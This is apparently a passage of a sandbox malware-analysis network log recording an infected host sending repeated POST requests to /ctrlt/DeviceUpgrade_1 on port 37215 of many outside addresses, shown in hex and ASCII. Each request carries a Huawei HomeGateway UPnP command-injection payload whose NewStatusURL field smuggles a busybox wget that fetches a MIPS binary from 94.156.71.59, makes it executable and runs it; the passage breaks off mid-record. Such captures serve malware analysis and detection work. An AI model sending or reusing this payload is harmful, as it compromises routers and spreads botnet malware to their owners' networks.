                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            338192.168.2.134573641.207.144.17637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.263818026 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            339192.168.2.1348610156.7.198.7737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.264605045 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            340192.168.2.135126841.201.241.19537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.265357018 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            341192.168.2.133737041.129.146.21837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.266123056 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            342192.168.2.1359132156.196.209.12937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.268090010 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            343192.168.2.1336416197.63.12.4637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.268898964 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            344192.168.2.133326241.249.87.25037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.270070076 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            345192.168.2.135775841.129.88.8637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.270804882 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            346192.168.2.135104841.136.101.10437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.271532059 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            347192.168.2.133853841.71.37.13037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.272285938 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
